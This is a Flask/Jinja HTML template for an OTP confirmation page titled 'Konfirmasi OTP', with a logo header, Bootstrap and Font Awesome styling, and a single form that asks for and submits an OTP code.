<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Konfirmasi OTP</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css">
    <link rel="shortcut icon" href="{{ url_for('static', filename='images/logomod.png') }}" type="image/x-icon">
    <style>
        body {
            background-size: cover;
            background-repeat: no-repeat;
            background-color: #ffffff;
            padding-top: 60px;
        }
        .header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            padding: 10px;
            background-color: #ffffff;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
            position: fixed;
            width: 100%;
            top: 0;
            left: 0;
            z-index: 1000;
        }
        .logo {
            width: 100px;
            height: auto;
        }
        .hamburger-menu {
            font-size: 24px;
            cursor: pointer;
            color: #a17a8a;
        }
        .input-group-text {
            background-color: #ffeef1;
            color: #a17a8a;
            border: none;
        }
        .form-control {
            border: 1px solid #ffccd5;
            color: #313130;
        }
        .btn {
            background-color: #db3d44;
            color: #ffffff;
            border-radius: 15px;
            border: none;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.2);
        }
        .gthyn {
            margin-top: 100px;
        }
    </style>
</head>
<body>
    <div class="container">
        <header class="header">
            <img src="{{ url_for('static', filename='images/logo-sgw.png') }}" alt="logo" class="logo">
            <div class="hamburger-menu">☰</div>
        </header>

        <main>
            <div class="row justify-content-center mb-4 gthyn">
                <div class="col-12 col-md-8 col-lg-6">
                    <h1 class="text-center custom-text">Confirm OTP</h1>
                    <form method="POST" action="">
                        <div class="mb-3" style="max-width: 350px; margin-left: auto; margin-right: auto;">
                            <div class="input-group" style="margin-top: 15px;">
                                <span class="input-group-text" id="basic-addon">
                                    <i class="fas fa-key"></i>
                                </span>
                                <input type="text" class="form-control" id="otp" name="otp" aria-label="OTP" aria-describedby="basic-addon1" placeholder="Input your OTP code" required>
                            </div>
                        </div>
                        <div class="d-grid gap-2 d-flex justify-content-center">
                            <button class="btn" type="submit">Submit</button>
                        </div>
                    </form>
                </div>
            </div>
        </main>
    </div>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.0/dist/js/bootstrap.bundle.min.js"></script>
    <script src="https://code.jquery.com/jquery.min.js"></script>
</body>
</html>